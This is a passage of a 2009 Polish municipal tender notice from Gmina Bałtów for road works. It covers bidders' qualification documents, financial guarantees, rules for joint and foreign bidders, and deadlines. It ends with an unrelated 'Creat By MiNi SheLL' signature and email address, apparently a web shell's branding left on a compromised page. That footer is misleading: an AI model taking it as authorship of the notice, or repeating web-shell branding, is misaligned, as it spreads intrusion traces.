- kierownik robót drogowych - do informacji należy dołączyć następujące dokumenty dotyczące kierownika robót drogowych przewidzianego do realizacji zadania: dokument stwierdzający przygotowanie zawodowe do pełnienia samodzielnych funkcji technicznych w budownictwie w specjalności drogowej oraz aktualne zaświadczenie o wpisie na listę Okręgowej Izby Inżynierów Budownictwa.
- kierownik robót konstrukcyjno-budowlanych - do informacji należy dołączyć następujące dokumenty dotyczące kierownika robót konstrukcyjno-budowlanych przewidzianego do realizacji zadania: dokument stwierdzający przygotowanie zawodowe do pełnienia samodzielnych funkcji technicznych w budownictwie w specjalności konstrukcyjno - budowlanej oraz aktualne zaświadczenie o wpisie na listę Okręgowej Izby Inżynierów Budownictwa.
5. Wskazanie części zamówienia (robót) których wykonanie zostanie powierzone podwykonawcom - na formularzu stanowiącym  Załącznik Nr 18 do SIWZ.
Jeżeli Wykonawca będzie wykonywał całość robót objętych niniejszym zamówieniem bez udziału podwykonawców, we wszystkich wierszach tabeli wpisuje -nie dotyczy-.
D. W celu potwierdzenia spełnienia warunku znajdowania się przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia należy złożyć następujące dokumenty:
1.  Informację z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy na kwotę minimum 5 000 000,00 zł, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
2. Polisę, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę minimum 1 000 000,00 zł.
E. Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej:
1. Zamiast dokumentów, o których mowa w pkt. B.1), B.3), B.5) składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
b) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2. Zamiast dokumentu, o którym mowa w pkt. B.4) składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy Prawo zamówień publicznych - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów wskazanych w niniejszym pkt. -E- zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawionych nie wcześniej niż w terminach określonych w niniejszym pkt. -E-.
F. Dokumenty wymagane w przypadku składania oferty wspólnej:
1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku dla ustanowionego pełnomocnika do oferty należy załączyć pełnomocnictwo do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy.
2. W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone dokumenty dla każdego z nich z osobna - dotyczy oświadczeń i dokumentów opisanych w pkt. B. 
3. W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny i kadrowy, łączne kwalifikacje i doświadczenie oraz sytuacja ekonomiczna i finansowa.
4. Oferta winna zawierać: oświadczenia i dokumenty opisane w pkt. B dla każdego partnera z osobna, pozostałe dokumenty składane i oceniane są wspólnie.
G. Postanowienia dotyczące składanych dokumentów:
1. Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii potwierdzonych za zgodność przez Wykonawcę lub osobę / osoby uprawnione do podpisania oferty z dopiskiem -za zgodność z oryginałem-.
2 Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.gminabaltow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Bałtów (Urząd Gminy w Bałtowie), Bałtów 32/1, 27-423 Bałtów.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.10.2009 godzina 11:00, miejsce: Gmina Bałtów (Urząd Gminy w Bałtowie), Bałtów 32/1, 27-423 Bałtów, sekretariat, pok. nr 14.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com